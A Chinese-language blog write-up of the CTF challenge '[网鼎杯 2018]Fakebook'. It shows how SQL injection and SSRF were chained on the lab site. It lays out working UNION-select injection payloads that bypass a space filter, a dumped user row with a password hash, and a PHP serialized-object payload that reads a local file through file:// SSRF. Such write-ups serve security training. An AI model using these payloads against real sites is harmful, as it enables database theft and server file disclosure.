首页 > 其他分享 >[网鼎杯 2018]Fakebook

[网鼎杯 2018]Fakebook

时间:2024-11-20 22:08:23浏览次数:1  
标签:ch name no blog 2018 curl 网鼎杯 Fakebook select

访问网站的robots.txt,看看有没有线索

找到了user.php的源码,直接访问这个备份文件。下载完成直接打开用就好,记事本就可以打开.bak文件

  <?php
  
  
  class UserInfo
  {
      public $name = "";
      public $age = 0;
      public $blog = "";
  
      public function __construct($name, $age, $blog)
      {
          $this->name = $name;
          $this->age = (int)$age;
          $this->blog = $blog;
      }
  
      function get($url)
      {
          $ch = curl_init();
  
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
          $output = curl_exec($ch);
          $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
          if($httpCode == 404) {
              return 404;
          }
          curl_close($ch);
  
          return $output;
      }
  
      public function getBlogContents ()
      {
          return $this->get($this->blog);
      }
  
      public function isValidBlog ()
      {
          $blog = $this->blog;
          return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
      }
  
  }

审计代码发现,get函数中存在curl_exec()函数,这是一个常见的SSRF漏洞函数。

常见的SSRF漏洞函数有:
file_get_contents:从用户指定的url获取图片。然后把它用一个随即文件名保存在硬盘上,并展示给用户。
fsockopen:会使用socket跟服务器建立tcp连接,传输原始数据。
curl_exec:curl_exec 函数会返回请求的结果

  function get($url)
      {
          $ch = curl_init();
  
          curl_setopt($ch, CURLOPT_URL, $url);
          curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
          $output = curl_exec($ch);
          $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
          if($httpCode == 404) {
              return 404;
          }
          curl_close($ch);
  
          return $output;
      }

这段代码主要根据url,执行url将结果返回给output,再进行判断,若资源未找到优先返回404,否则返回output。
上述代码的类为UserInfo为用户信息,所以注入点再username中的链接,先点join创建一个博客

点击123访问,

访问一个错误的参数no=2,发现age和blog参数都报错,看来最好的注入位置是username。

以下是我们注入的payload,但注意union和select中间不能用空格,需要替换为/**/

  ?no=1 order by 4
  # 得知回显列数为4
  ?no=-1 union/**/select 1,2,3,4
  # username在第2个位置
  ?no=-1 union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata
  # fakebook,information_schema,mysql,performance_schema,test
  ?no=-1 union/**/select 1,database(),3,4
  # fakebook
  ?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'
  # users
  ?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'
  # no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
  ?no=-1 union/**/select 1,group_concat(no,'~',username,'~',passwd,'~',data),3,4 from fakebook.users
  # 1~123~cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e~O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:21;s:4:"blog";s:7:"123.com";}

可以发现data中存在的是序列化的字符串,我们要进行反序列化操作拿到flag

根据报错的回显,我们知道其路径在/var/www/html/下。
构造反序列化poc:

  <?php
      class UserInfo {
          public $name = "123";
          public $age = 7;
          public $blog = "file:///var/www/html/flag.php";
      }
  
      $a = new UserInfo();
      $exp = serialize($a);
      echo $exp;
  ?>

得到序列化的值:

  O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:7;s:4:"blog";s:29:"file:///var/www/html/flag.php";}

我们根据注入得到的序列化的值可知,data位于第四个位置,所以我们把这个序列化的值也放到注入的第4个位置,最后payload为:

  ?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"123";s:3:"age";i:7;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

查看页面源码

找到flag

标签:ch,name,no,blog,2018,curl,网鼎杯,Fakebook,select
From: https://www.cnblogs.com/abenben/p/18559446

相关文章

  • 网鼎杯 2024 玄武 pwn2 (kernel)
    setup准备工作voidunshare_setup(){charedit[0x100];inttmp_fd;//fromlibpthreadunshare(CLONE_NEWNS|CLONE_NEWUSER|CLONE_NEWNET);//fromlibfcntltmp_fd=open("/proc/self/setgroups",O_WRONLY);write(tmp_f......
  • [HCTF 2018]Warmup 详细题解
    知识点:目录穿越_文件包含static静态方法参数传递引用mb_strpos函数    mb_substr函数正文:页面有一张滑稽的表情包,查看一下页面源代码,发现提示那就访问/source.php 得到源码<?phphighlight_file(__FILE__);classemmm{publics......
  • 2024网鼎杯青龙组Misc详解
    MISC01某单位网络遭到非法的攻击,安全人员对流量调查取证之后保存了关键证据,发现人员的定位信息存在泄露,请对其进行分析。flag为用户位置信息进行32位md5哈希值位置信息,所有我们开始试ip地址,试了一堆发现思路错误,4g通讯流量,直接问ChatgptMD5加密MISC02题目附件给了一个未知......
  • [BUUCTF 2018]Online Tool
    题目链接:[BUUCTF2018]OnlineTool。打开环境,如下所示。直接得到源码,如下。<?phpif(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){$_SERVER['REMOTE_ADDR']=$_SERVER['HTTP_X_FORWARDED_FOR'];}if(!isset($_GET['host'])){highl......
  • 2024网鼎杯青龙misc04
    2024网鼎杯misc04Misc04首先看到一个杂乱的图片不过这是一个皮亚诺曲线上脚本fromPILimportImagefromtqdmimporttqdmdefpeano(n):ifn==0:return[[0,0]]else:in_lst=peano(n-1)lst=in_lst.copy()px,py=lst[-1]......
  • [网鼎杯 2018]Fakebook 1
    [网鼎杯2018]Fakebook1打开实例发现为博客列表,有登录跳转和类似注册或者添加博客的join跳转查看源码无果打开登陆页,尝试万能密码没有用,尝试从join入手,用admin去随便join一个显示博客不存在期间尝试多种sql注入方法均没有效果,转去其他方向尝试dirsearch目录爆破,发现了......
  • PKUSC2018 最大前缀和
    题意给一个长度为\(n\)的整数序列,求其\(n!\)种排列方式的最大前缀和(不能为空)的总和。\(n\leq20\)解法设全集为\(U\),考虑枚举作为最大前缀和的子集\(S\)。那么要求的就是\(S\)排列后严格最大前缀和在最后一个元素取到和方案数和\(U\backslashS\)排列后每个前缀......
  • [AHOI2018初中组] 分组
    题目Description小可可的学校信息组总共有 nn 个队员,每个人都有一个实力值 aiai​。现在,一年一度的编程大赛就要到了,小可可的学校获得了若干个参赛名额,教练决定把学校信息组的 nn 个队员分成若干个小组去参加这场比赛。但是每个队员都不会愿意与实力跟自己过于悬殊的......
  • 洛谷P11183 [ROIR 2018 Day2] 大数据处理
    涉及知识点:动态开点线段树,贪心前言很妙很感性直观的贪心,做完神清气爽。题意Link有一个长为\(2^k\)的序列,编号从\(0\)开始,你要在上面染色,每次只能染色\([k2^i,(k+1)2^i-1]\)的区间(\(0\leqi<k\)),问最少要染色多少次才能变成给定的目标序列。目标序列以形如\((x_1,y_1),(......
  • [Ynoi2018] 未来日记
    [Ynoi2018]未来日记老早之前就想写了,人生中第一道大分块,调了一上午+下午一个小时,对拍了不知道多少万组,终于过了。\[\Huge{本题不卡常本题不卡常本题不卡常本题不卡常本题不卡常本题不卡常本题不卡常}\]\[\Huge{快来写快来写快来写快来写快来写快来写快来写快来写快来写快来写......

赞助商

阅读排行

网站主页关于我们联系我们网站地图

本网站内容转载自其他媒体,侵权联系[admin##ips99.com]。

Copyright © 2020-2023 IPS99 版权所有 IPS99